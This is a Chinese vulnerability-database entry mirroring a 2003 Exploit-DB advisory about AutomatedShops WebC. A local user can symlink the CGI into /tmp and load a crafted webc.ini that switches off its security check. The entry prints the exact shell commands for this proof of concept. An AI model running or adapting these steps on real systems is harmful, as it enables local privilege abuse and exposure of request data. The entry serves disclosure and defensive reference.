AutomatedShops WebC 2.0/5.0 – Symbolic Link Following Configuration File

漏洞ID	1053806	漏洞类型
发布时间	2003-04-03	更新时间	2003-04-03
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Linux	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/22456

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

source: http://www.securityfocus.com/bid/7272/info

It has been reported that WebC will execute in the directory of a symbolic link from which it is invoked. Because of this, it may be possible for a local user to load a configuration file that enabled dangerous variables. 

$ cd /tmp
$ ln -s /usr/local/apache/cgi-bin/webc.cgi webc.cgi
$ cp /usr/local/apache/cgi-bin/webc.emf .
$ echo "WEBC_NO_SECURITY_CHECK=True" > webc.ini
$ echo "HTML_TRACE_REQUEST=/tmp/.debug1" >> webc.ini
$ ./webc.cgi

相关推荐: Turbolinux pmake提升特权漏洞

Turbolinux pmake提升特权漏洞漏洞ID 1205770 漏洞类型未知发布时间 2001-05-24 更新时间 2001-05-24 CVE编号 CVE-2001-1327 CNNVD-ID CNNVD-200105-091 漏洞平台 N/A…